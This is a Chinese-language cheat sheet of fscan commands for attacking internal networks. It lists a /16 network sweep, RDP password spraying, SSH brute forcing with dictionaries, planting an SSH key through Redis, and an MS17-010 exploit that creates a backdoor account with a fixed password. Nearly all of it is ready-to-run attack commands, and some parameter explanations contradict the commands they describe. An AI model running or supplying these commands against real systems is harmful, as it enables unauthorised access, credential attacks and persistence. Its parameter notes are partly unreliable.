1) 一把梭
fscan -t 150 -time 5 -h 192.168.0.0/16
参数解释
-t 150:设置扫描的线程数为150
-time 5:设置扫描的超时时间为5秒
-p service:指定扫描的服务类型为常规服务
-h 192.168.0.0/16:指定扫描的目标网络范围
2) Web服务探测
fscan -t 100 -time 5 -wt 8 -p web -h 192.168.0.1/24
参数解释
-wt 8:设置Web服务探测的超时时间为15秒
-p web:指定扫描的服务类型为Web服务
3) 服务检测
fscan -t 100 -time 5 -p service -nobr -noredis -np -hf ips.txt
参数解释
-noredis:不扫描Redis服务
-hf ips.txt:指定扫描的目标IP地址列表
4) 密码喷洒
fscan -m rdp -user administrator -pwd P@ssword -hf rdp.txt
参数解释
-m rdp:指定扫描的服务类型为RDP
-user administrator:指定要尝试的用户名
-pwd P@ssword:指定要尝试的密码
5) 弱口令检测
fscan -m ssh -hf ssh.txt
爆破参数说明
-usera string:在默认用户列表基础上添加自定义用户名
-pwda string:在默认密码列表基础上添加自定义密码
-userf string:从文件中读取用户名字典
-pwdf string:从文件中读取密码字典
6) 漏洞利用
Redis写公钥
fscan -p 6379 -rf /root/.ssh/id_rsa.pub -hf redis.txt
MS17-010利用
执行此命令后会生成一个用户,用户名:sysadmin 密码:'1qaz@WSX!@#4'
fscan -h 192.168.1.1 -m ms17010 -sc add